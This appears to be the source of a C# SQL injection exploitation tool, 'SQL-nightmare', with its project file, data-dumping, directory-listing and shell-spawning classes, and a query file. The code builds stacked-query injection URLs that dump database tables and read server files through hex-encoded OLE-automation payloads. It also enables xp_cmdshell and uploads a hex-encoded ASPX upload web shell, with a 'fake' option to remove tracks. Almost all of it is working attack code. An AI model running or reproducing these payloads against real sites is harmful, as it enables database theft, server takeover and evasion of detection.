40 |     <Reference Include="Microsoft.CSharp" />
41 |     <Reference Include="System.Data" />
42 |     <Reference Include="System.Xml" />
43 |   </ItemGroup>
44 |   <ItemGroup>
45 |     <Compile Include="DirListing.cs" />
46 |     <Compile Include="DumpData.cs" />
47 |     <Compile Include="Exploitation.cs" />
48 |     <Compile Include="FileIO.cs" />
49 |     <Compile Include="HTTPMethods.cs" />
50 |     <Compile Include="Log.cs" />
51 |     <Compile Include="Program.cs" />
52 |     <Compile Include="Properties\AssemblyInfo.cs" />
53 |     <Compile Include="QueriesDB.cs" />
54 |     <Compile Include="QueryCrafter.cs" />
55 |     <Compile Include="ReadFile.cs" />
56 |     <Compile Include="ResponseFilter.cs" />
57 |     <Compile Include="ShellSpawning.cs" />
58 |     <Compile Include="UserInteraction.cs" />
59 |     <Compile Include="XML.cs" />
60 |   </ItemGroup>
61 |   <ItemGroup>
62 |     <None Include="App.config" />
63 |   </ItemGroup>
64 |   <Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
65 |   <!-- To modify your build process, add your task inside one of the targets below and uncomment it. 
66 |        Other similar extension points exist, see Microsoft.Common.targets.
67 |   <Target Name="BeforeBuild">
68 |   </Target>
69 |   <Target Name="AfterBuild">
70 |   </Target>
71 |   -->
72 | </Project>


--------------------------------------------------------------------------------
/SQL-nightmare/DirListing.cs:
--------------------------------------------------------------------------------
  1 | using System;
  2 | using System.Collections.Generic;
  3 | using System.Text;
  4 | 
  5 | namespace SQL_nightmare
  6 | {
  7 |     class DirListing
  8 |     {
  9 |         public static void initialize(string url)
 10 |         {
 11 |             Log.logNotification("Confirming Web Response..");
 12 | 
 13 |             var urlForResponseConfirmation = QueryCrafter.constructURLForConfirmation(url, QueriesDB.Replacement);
 14 | 
 15 |             if (ResponseFilter.confirmResponce(urlForResponseConfirmation, QueriesDB.Replacement))
 16 |             {
 17 |                 Log.logNotification("Web Response is OK..");
 18 | 
 19 |                 if (createFuncDir(url))
 20 |                 {
 21 |                     string UserChoice = "z";
 22 |                     while (UserChoice != "x")
 23 |                     {
 24 |                         UserChoice = UserInteraction.takeInputString("Press 'x' for Exit..\nEnter Directory to get listing.. eg C:\\, C:\\users\\.. ");
 25 | 
 26 |                         if (UserChoice != "x")
 27 |                             navigate(url, UserChoice);
 28 | 
 29 |                     }
 30 | 
 31 |                     dropObject(url, QueriesDB.DropFuncQuery);
 32 |                 }
 33 |             }
 34 |             else
 35 |                 Log.logError("No response from the server..");
 36 |         }
 37 | 
 38 |         static bool createFuncDir(string url)
 39 |         {
 40 |             try
 41 |             {
 42 |                 var DIRFuncCreationURL = QueryCrafter.constructStackedQuery(url, QueriesDB.DirListingFuncQuery);
 43 |                 DIRFuncCreationURL = QueryCrafter.constructURLForConfirmation(DIRFuncCreationURL, QueriesDB.Replacement);
 44 |                 if (ResponseFilter.confirmResponce(DIRFuncCreationURL, QueriesDB.Replacement))
 45 |                 {
 46 |                     var DIRFuncConfirmationURL = QueryCrafter.constructQueryForSelectObject(url, QueriesDB.ConfirmDirFuncQuery);
 47 |                     var response = HTTPMethods.getResponse(DIRFuncConfirmationURL);
 48 | 
 49 |                     if (response != null)
 50 |                     {
 51 |                         if (ResponseFilter.getPureResponseWithLastIndex(response) == "Dir")
 52 |                         {
 53 |                             Log.logOutput("Function to get Directory Listing is created..");
 54 |                             return true;
 55 |                         }
 56 |                         else
 57 |                         {
 58 |                             Log.logError("Function to get Directory Listing cannot be created..");
 59 |                             return false;
 60 |                         }
 61 |                     }
 62 |                     else
 63 |                     {
 64 |                         Log.logError("Function to get Directory Listing cannot be created..");
 65 |                         return false;
 66 |                     }
 67 |                 }
 68 |                 else
 69 |                 {
 70 |                     Log.logError("Erroneous response from the server..");
 71 |                     Log.logError("Function to get Directory Listing cannot be created..");
 72 |                     return false;
 73 |                 }
 74 |             }
 75 |             catch (Exception ex)
 76 |             {
 77 |                 Log.logError(ex.Message);
 78 |                 return false;
 79 |             }
 80 |         }
 81 | 
 82 |         static bool dropObject(string url, string ObjectDroppingQuery)
 83 |         {
 84 |             try
 85 |             {
 86 |                 var DirFuncDroppingQuery = QueryCrafter.constructURLForDroppingObject(url, ObjectDroppingQuery);
 87 |                 DirFuncDroppingQuery = QueryCrafter.constructURLForConfirmation(DirFuncDroppingQuery, QueriesDB.Replacement);
 88 |                 if (ResponseFilter.confirmResponce(DirFuncDroppingQuery, QueriesDB.Replacement))
 89 |                     return true;
 90 |                 else
 91 |                     return false;
 92 |             }
 93 |             catch (Exception ex)
 94 |             {
 95 |                 Log.logError(ex.Message);
 96 |                 return false;
 97 |             }
 98 |         }
 99 | 
100 |         static void navigate(string url, string dir)
101 |         {
102 |             var URLForNavigating = QueryCrafter.constructQueryForSelectObject(url, QueriesDB.ReadDirWithFuncQuery);
103 |             URLForNavigating = URLForNavigating.Replace("[DIR]", dir);
104 | 
105 |             var response = HTTPMethods.getResponse(URLForNavigating);
106 |             response = ResponseFilter.getPureResponseWithLastIndex(response);
107 | 
108 |             response = XML.addRoot(response);
109 | 
110 |             FileIO.createWriteFile(response, "tmp.txt");
111 | 
112 |             List<string> DirectoryFiles = XML.parseXML("tmp.txt", "dir");
113 | 
114 |             Log.showObjects(DirectoryFiles, "DIR Listing");
115 | 
116 |         }
117 |     }
118 | }


--------------------------------------------------------------------------------
/SQL-nightmare/DumpData.cs:
--------------------------------------------------------------------------------
  1 | using System;
  2 | using System.Collections.Generic;
  3 | using System.IO;
  4 | using System.Text;
  5 | 
  6 | namespace SQL_nightmare
  7 | {
  8 |     class DumpData
  9 |     {
 10 |         
 11 |        
 12 |         public static void initialize(string url)
 13 |         {
 14 |             Log.logNotification("Confirming Web Response..");
 15 | 
 16 |             var urlForResponseConfirmation = QueryCrafter.constructURLForConfirmation(url, QueriesDB.Replacement);
 17 | 
 18 |             if (ResponseFilter.confirmResponce(urlForResponseConfirmation, QueriesDB.Replacement))
 19 |             {
 20 |                 Log.logNotification("Web Response is OK..");
 21 |                 getTables(url);
 22 |             }
 23 |             else
 24 |                 Log.logError("No response from the server..");
 25 |         }
 26 | 
 27 |         public static void getTables(string url)
 28 |         {
 29 |             string[] Tables = getObjects(url, QueriesDB.TableStackedQuery, QueriesDB.Replacement);
 30 | 
 31 |             if (Tables != null)
 32 |             {
 33 |                 dropTempTable(url, QueriesDB.DropTableStackedQuery, QueriesDB.Replacement);
 34 | 
 35 |                 var Choice = -1;
 36 | 
 37 |                 while (Choice != 0)
 38 |                 {
 39 |                     Console.Clear();
 40 | 
 41 |                     Log.showObjects(Tables, "TABLE");
 42 | 
 43 |                     Choice = UserInteraction.showMenuForIntChoice("Press 0 to EXIT..\nPress Corresponding Key to dump TABLE ");
 44 | 
 45 |                     if (Choice > 0 && Choice <= Tables.Length)
 46 |                     {
 47 |                         var UserSelectedTable = Tables[Choice - 1];
 48 |                         getColumns(url, UserSelectedTable);
 49 | 
 50 |                     }
 51 |                 }
 52 |             }
 53 |             Tables = null;
 54 |         }
 55 | 
 56 |         public static void getColumns(string url, string tableName)
 57 |         {
 58 |             string UserColumnQuery = QueryCrafter.constructQueryForColumns(QueriesDB.ColumnStackedQuery, tableName);
 59 | 
 60 |             string[] Columns = getObjects(url, UserColumnQuery, QueriesDB.Replacement);
 61 | 
 62 |             if (Columns != null)
 63 |             {
 64 |                 dropTempTable(url, QueriesDB.DropTableStackedQuery, QueriesDB.Replacement);
 65 |                 Log.showObjects(Columns, "COLUMN");
 66 |                 dumpData(url, tableName, Columns);
 67 |             }
 68 |             Columns = null;
 69 |         }
 70 | 
 71 |         public static void dumpData(string url, string UserSelectedTable, string[] Columns)
 72 |         {
 73 |             var FileName = "";
 74 | 
 75 |             if (!String.IsNullOrEmpty((FileName = UserInteraction.takeInputForTableFileGeneration())))
 76 |             {
 77 |                 var XAML = XML.addRoot(ResponseFilter.getPureResponse(HTTPMethods.getResponse(QueryCrafter.constructQueryForDataDump(url, UserSelectedTable, QueriesDB.TableDumpQuery))));
 78 |                 dumpXML(XAML, UserSelectedTable, FileName, Columns);
 79 | 
 80 |                 Log.logNotification("If ur unable to see table Data, dont worry I've another method..");
 81 |                 UserInteraction.promptForUserInput("Press 'n' to try another method OR Press any key to continue..");
 82 |                 var UserInput = Console.ReadLine();
 83 | 
 84 |                 if (UserInput.ToLower() == "n")
 85 |                 {
 86 |                     XAML = XML.addRoot(ResponseFilter.getPureResponseWithLastIndex(HTTPMethods.getResponse(QueryCrafter.constructQueryForDataDump(url, UserSelectedTable, QueriesDB.TableDumpQuery))));
 87 |                     dumpXML(XAML, UserSelectedTable, FileName, Columns);
 88 |                 }
 89 | 
 90 |                 Log.logNotification("Data dump complete.. and if no data is displayed to you.. table might be empty.. Press any key to continue..");
 91 |                 Console.ReadKey();
 92 |             }
 93 | 
 94 |             FileIO.deleteTempFile("tmp.txt");
 95 |         }
 96 | 
 97 |         public static string[] getObjects(string url, string stackedQuery, string replacement)
 98 |         {
 99 | 
100 |             string URLFortableDumpToTempTable = QueryCrafter.construcQueryForTableDump(url, stackedQuery, replacement);
101 | 
102 |             if (ResponseFilter.confirmResponce(URLFortableDumpToTempTable, replacement))
103 |             {
104 |                 string URLForTableOutput = QueryCrafter.constructURLForOutputFromTempTable(url);
105 | 
106 |                 var response = HTTPMethods.getResponse(URLForTableOutput);
107 | 
108 |                 if (response != null)
109 |                 {
110 |                     response = ResponseFilter.getPureResponse(response);
111 | 
112 |                     return ResponseFilter.parseResponce(response);
113 |                 }
114 |                 else
115 |                     return null;
116 |             }
117 |             else
118 |                 return null;
119 |         }
120 | 
121 |         public static bool dropTempTable(string url, string dropTableStackedQuery, string replacement)
122 |         {
123 |             url = QueryCrafter.constructURLForConfirmation(url, QueriesDB.Replacement);
124 |             url = QueryCrafter.constructURLForDroppingObject(url, dropTableStackedQuery);
125 | 
126 |             if (HTTPMethods.getResponse(url).Contains(replacement))
127 |                 return true;
128 |             else
129 |                 return false;
130 |         }
131 | 
132 |         public static void dumpXML(string xml, string userSelectedTable, string fileName, string[] columns)
133 |         {
134 |             FileIO.deleteTempFile("tmp.txt");
135 |             FileIO.createWriteFile(xml, "tmp.txt");
136 |             XML.parseXML(userSelectedTable, fileName, columns);
137 |         }
138 | 
139 |     }
140 | }
141 | 


--------------------------------------------------------------------------------
/SQL-nightmare/ShellSpawning.cs:
--------------------------------------------------------------------------------
  1 | using System;
  2 | using System.Collections.Generic;
  3 | using System.Text;
  4 | 
  5 | namespace SQL_nightmare
  6 | {
  7 |     class ShellSpawning
  8 |     {
  9 |         public static void Spawn(string url)
 10 |         {
 11 |             Log.logNotification("Confirming Web Response..");
 12 | 
 13 |             var urlForResponseConfirmation = QueryCrafter.constructURLForConfirmation(url, QueriesDB.Replacement);
 14 | 
 15 |             if (ResponseFilter.confirmResponce(urlForResponseConfirmation, QueriesDB.Replacement))
 16 |             {
 17 |                 Log.logNotification("Web Response is OK..");
 18 | 
 19 |                 if (createProcFcUk(url))
 20 |                 {
 21 |                     string RootPath = "z";
 22 |                     while (RootPath != "x")
 23 |                     {
 24 |                         RootPath = UserInteraction.takeInputString("Press x for Exit..\nEnter root for folder path C:\\websites\\somedir\\ ");
 25 |                         if (RootPath != "x")
 26 |                         {
 27 |                             string fileName = UserInteraction.takeInputString("Enter filename to upload eg. shell.aspx ..");
 28 | 
 29 |                             string UrlForUploading = null;
 30 |                             
 31 |                             string x = UserInteraction.takeInputString("Press 'r' for using Real Shell Contents..\nPress 'f' for fake Shell Contens to remove tracks..");
 32 |                             
 33 |                             if (x == "f")
 34 |                                 UrlForUploading = QueryCrafter.constructStackedQuery(url, QueriesDB.FileUploadingQueryFAKE);
 35 |                             else
 36 |                                 UrlForUploading = QueryCrafter.constructStackedQuery(url, QueriesDB.FileUploadingQueryREAL);
 37 | 
 38 | 
 39 |                             UrlForUploading = UrlForUploading.Replace("[PATH]", RootPath);
 40 |                             UrlForUploading = UrlForUploading.Replace("[FILENAME]", fileName);
 41 |                             UrlForUploading = UrlForUploading.Replace("rummykhan", QueriesDB.Replacement);
 42 | 
 43 |                             Log.logNotification("Uploading shell to " + RootPath + fileName);
 44 | 
 45 |                             if (ResponseFilter.confirmResponce(UrlForUploading, QueriesDB.Replacement))
 46 |                             {
 47 |                                 Log.logNotification("Confirming File Upload..");
 48 |                                 if (confirmFileUpload(url, RootPath + fileName))
 49 |                                     Log.logOutput("Shell uploaded successfully to : " + RootPath + fileName);
 50 |                                 else
 51 |                                     Log.logError("Fail to upload file..");
 52 |                             }
 53 |                         }
 54 |                     }
 55 |                 }
 56 |                 dropObject(url, QueriesDB.DropFcUkProcQuery);
 57 |             }
 58 |             else
 59 |                 Log.logError("No response from the server..");
 60 |         }
 61 | 
 62 |         static bool createProcFcUk(string url)
 63 |         {
 64 |             try
 65 |             {
 66 |                 var FcUkProcCreationURL = QueryCrafter.constructStackedQuery(url, QueriesDB.UploadFileProcQuery);
 67 |                 FcUkProcCreationURL = QueryCrafter.constructURLForConfirmation(FcUkProcCreationURL, QueriesDB.Replacement);
 68 | 
 69 |                 if (ResponseFilter.confirmResponce(FcUkProcCreationURL, QueriesDB.Replacement))
 70 |                 {
 71 |                     var FcUkProcConfirmationURL = QueryCrafter.constructQueryForSelectObject(url, QueriesDB.ConfirmFcUkProcQuery);
 72 |                     var response = HTTPMethods.getResponse(FcUkProcConfirmationURL);
 73 | 
 74 |                     if (response != null)
 75 |                     {
 76 |                         if (ResponseFilter.getPureResponseWithLastIndex(response) == "FcUk")
 77 |                         {
 78 |                             Log.logOutput("Procedure to Upload Shell is created..");
 79 |                             return true;
 80 |                         }
 81 |                         else
 82 |                         {
 83 |                             Log.logError("1 Procedure to Upload Shell cannot be created..");
 84 |                             return false;
 85 |                         }
 86 |                     }
 87 |                     else
 88 |                     {
 89 |                         Log.logError("2 Procedure to Upload Shell cannot be created..");
 90 |                         return false;
 91 |                     }
 92 |                 }
 93 |                 else
 94 |                 {
 95 |                     Log.logError("Erroneous response from the server..");
 96 |                     Log.logError("Procedure to Upload Shell cannot be created..");
 97 |                     return false;
 98 |                 }
 99 |             }
100 |             catch (Exception ex)
101 |             {
102 |                 Log.logError(ex.Message);
103 |                 return false;
104 |             }
105 |         }
106 | 
107 |         static bool dropObject(string url, string ObjectDroppingQuery)
108 |         {
109 |             try
110 |             {
111 |                 var DirFuncDroppingQuery = QueryCrafter.constructURLForDroppingObject(url, ObjectDroppingQuery);
112 |                 DirFuncDroppingQuery = QueryCrafter.constructURLForConfirmation(DirFuncDroppingQuery, QueriesDB.Replacement);
113 |                 if (ResponseFilter.confirmResponce(DirFuncDroppingQuery, QueriesDB.Replacement))
114 |                     return true;
115 |                 else
116 |                     return false;
117 |             }
118 |             catch (Exception ex)
119 |             {
120 |                 Log.logError(ex.Message);
121 |                 return false;
122 |             }
123 |         }
124 | 
125 |         static bool confirmFileUpload(string url, string rootPathForFile)
126 |         {
127 |             try
128 |             {
129 |                 if (ReadFile.ReadFileDirect(url, rootPathForFile) != null)
130 |                     return true;
131 |                 else
132 |                     return false;
133 |             }
134 |             catch (Exception ex)
135 |             {
136 |                 Log.logError(ex.Message);
137 |                 return false;
138 |             }
139 |         }
140 |     }
141 | }
142 | 


--------------------------------------------------------------------------------
/SQL-nightmare/QueriesDB.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using System.Collections.Generic;
 3 | using System.IO;
 4 | using System.Text;
 5 | using System.Xml;
 6 | 
 7 | namespace SQL_nightmare
 8 | {
 9 |     class QueriesDB
10 |     {
11 |         public static string Replacement = "ch198mno574x";
12 | 
13 |         public static string TableStackedQuery = ";begin declare @x varchar(MAX) set @x = 'x102x' SELECT @x = @x %2b ':' %2b TABLE_NAME FROM INFORMATION_SCHEMA.TABLES set @x = @x %2b ':x102y' SELECT @x as oxp into xrummyTables end--X-";
14 |         public static string ColumnStackedQuery = ";begin declare @x varchar(MAX) set @x = 'x102x' SELECT @x = @x %2b':'%2b COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = [TABLENAME]; set @x = @x %2b':x102y' SELECT @x as oxp into xrummyTables end--X-";
15 |         public static string DropTableStackedQuery = ";drop table xrummyTables--X-";
16 |         public static string TableDumpQuery = "'x102x:'%2b(SELECT * FROM [TABLENAME] for xml auto)%2b':x102y'";
17 | 
18 |         public static string DirListingFuncQuery = ";begin declare @x varchar(MAX) SET @x = 0x4352454154452046554e4354494f4e204469722840776320564152434841522838303030292952455455524e5320406d64205441424c45285b706174685d205641524348415228323030302929415320424547494e204445434c41524520407a20494e542c407220494e542c406a20494e542c406220494e542c406c20494e542c407420564152434841522831303030292c406320564152434841522831303030292c406520494e542c407720494e542c406720494e542c4070617468205641524348415228323030302920455845435554452040653d73705f4f4143726561746520275368656c6c2e4170706c69636174696f6e272c407a204f55542049462040653d302053454c4543542040623d407a2c2040633d274e616d6553706163652822272b4077632b272229272049462040653d302020455845435554452040653d73705f4f414d6574686f6420407a2c40632c4072204f55542053454c4543542040623d40722c2040633d274974656d732e436f756e74272049462040653d3020455845435554452040653d73705f4f414d6574686f642040722c2040632c204077204f55542049462040653d302053454c4543542040623d40722c2040633d276974656d732829272049462040653d302020455845435554452040653d73705f4f414d6574686f642040722c40632c406c204f55545055542053454c4543542040673d30205748494c452040653d3020414e442040673c20407720424547494e2049462040653d302053454c4543542040623d406c2c2040633d276974656d28272b434153542840672041532056415243484152283529292b2729272049462040653d3020455845435554452040653d73705f4f414d6574686f6420406c2c2040632c20406a204f55545055542049462040653d302053454c4543542040623d406a2049462040653d3020455845435554452040653d73705f4f414d6574686f6420406a2c2770617468272c204070617468204f555450555420494e5345525420494e544f20406d642870617468292053454c4543542040706174682049462040653d302053454c4543542040673d40672b3120454e442052455455524e20454e44 EXEC(@x)end--X-";
19 |         public static string ConfirmDirFuncQuery = "'x102x:'%2b(select name from sys.objects where name='dir')%2b':x102y'";
20 |         public static string ReadDirWithFuncQuery = "'x102x:'%2b(select path from dir('[DIR]') as dir for xml auto)%2b':x102y'";
21 |         
22 |         public static string ReadFileOpenRowSetQuery = "'x102x:'%2b(cast((select bulkcolumn from OPENROWSET(BULK '[FILENAME]', SINGLE_BLOB) AS x)as varchar(MAX)))%2b':x102y'";
23 |         public static string DropFuncQuery = ";drop function dir--X-";
24 | 
25 |         public static string UploadFileProcQuery = ";begin declare @x varchar(MAX) SET @x=0x4352454154452050524f434544555245204663556b284073742056617263686172286d6178292c4070205641524348415228323535292c40666e20564152434841522831303029294153204445434c4152452020406f667320696e742c406f747320696e742c406f656f20696e742c4073656d20566172636861722831303030292c40636d6420766172636861722831303030292c406820696e742c40666e70207661726368617228383029736574206e6f636f756e74206f6e2073656c656374204073656d3d276f272045584543555445204068203d2073705f4f41437265617465202027536372697074696e672e46696c6553797374656d4f626a656374272c20406f6673204f55542053656c6563742040666e703d40702b275c272b40666e2069662040683d302053656c65637420406f656f3d406f6673202c204073656d3d274372656174696e672066696c652022272b40666e702b2722272069662040683d3020657865637574652040683d73705f4f414d6574686f6420406f66732c274372656174655465787446696c65272c406f7473204f55542c40666e702c322c547275652069662040683d302053656c65637420406f656f3d406f74732c204073656d3d27777474662022272b40666e702b2722272069662040683d3020657865637574652040683d73705f4f414d6574686f642020406f74732c20275772697465272c204e756c6c2c204073742069662040683d302053656c65637420406f656f3d406f74732c204073656d3d276374662022272b40666e702b2722272069662040683d3020657865637574652040683d73705f4f414d6574686f642020406f74732c2027436c6f7365272069662040683c3e3020626567696e204465636c6172652040737263207661726368617228323535292c40646573205661726368617228323535292c40686c66205661726368617228323535292c4048656c70494420696e7420455845435554452073705f4f414765744572726f72496e666f2020406f656f2c2040737263206f75747075742c40646573206f75747075742c40686c66206f75747075742c4048656c704944206f757470757420656e64;EXEC(@x);end--X-";
26 |         public static string ConfirmFcUkProcQuery = "'x102x:'%2b(select name from sys.objects where name='FcUk')%2b':x102y'";
27 |         public static string DropFcUkProcQuery = ";drop proc FcUk--X-";
28 | 
29 |         public static string FileUploadingQueryFAKE = ";begin declare @x varchar(MAX) SET @x=0x72756d6d796b686163c2f666f726d3e  exec FcUk @x,'[PATH]','[FILENAME]' end--X-";
30 |         public static string FileUploadingQueryREAL = ";begin declare @x varchar(MAX) SET @x=0x72756d6d796b68616e3c25402050616765204c616e67756167653d224323222044656275673d2266616c7365222074726163653d2266616c7365222076616c6964617465526571756573743d2266616c73652220456e61626c655669657753746174654d61633d2266616c73652220456e61626c655669657753746174653d227472756522253e3c7363726970742072756e61743d22736572766572223e70726f74656374656420766f69642075706c5f436c69636b286f626a6563742073656e6465722c204576656e7441726773206529207b7472797b6966202866752e48617346696c65297b66752e536176654173285365727665722e4d61705061746828222e2229202b225c5c222b2053797374656d2e494f2e506174682e47657446696c654e616d652866752e46696c654e616d6529293b526573706f6e73652e577269746528225375636365737322293b7d7d63617463687b526573706f6e73652e577269746528224661696c656422293b7d7d203c2f7363726970743e3c666f726d2069643d22666f726d31222072756e61743d22736572766572223e3c6173703a46696c6555706c6f61642049443d226675222072756e61743d2273657276657222202f3e3c6173703a427574746f6e2049443d2275706c222072756e61743d227365727665722220546578743d2255706c6f616422204f6e436c69636b3d2275706c5f436c69636b22202f3e3c2f666f726d3e  exec FcUk @x,'[PATH]','[FILENAME]' end--X-";
31 | 
32 |         public static string EnableOLEAutomation = ";EXEC sp_configure 'show advanced options',1;RECONFIGURE;EXEC sp_configure 'Ole Automation Procedures',1;RECONFIGURE--X-";
33 |         public static string EnableXPCMDShell = ";show advanced options',1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell',1;RECONFIGURE--X-";
34 | 
35 |         public static void initialize()
36 |         {
37 |             if (File.Exists("config.xml"))
38 |             {
39 |                 XmlDocument xDoc = new XmlDocument();
40 |                 xDoc.Load("config.xml");
41 |                 string tableStackedQuery = xDoc.GetElementsByTagName("tableStackedQuery")[0].InnerXml.Trim();
42 |                 string columnStackedQuery = xDoc.GetElementsByTagName("columnStackedQuery")[0].InnerXml.Trim();
43 |                 string dropTableStackedQuery = xDoc.GetElementsByTagName("dropTableStackedQuery")[0].InnerXml.Trim();
44 |                 string tableDumpQuery = xDoc.GetElementsByTagName("tableDumpQuery")[0].InnerXml.Trim();
45 | 
46 |                 if (!String.IsNullOrEmpty(tableStackedQuery))
47 |                     TableStackedQuery = tableStackedQuery;
48 |                 if (!String.IsNullOrEmpty(columnStackedQuery))
49 |                     ColumnStackedQuery = columnStackedQuery;
50 |                 if (!String.IsNullOrEmpty(dropTableStackedQuery))
51 |                     DropTableStackedQuery = dropTableStackedQuery;
52 |                 if (!String.IsNullOrEmpty(tableDumpQuery))
53 |                     TableDumpQuery = tableDumpQuery;
54 |             }
55 |         }
56 |     }
57 | }
58 | 


--------------------------------------------------------------------------------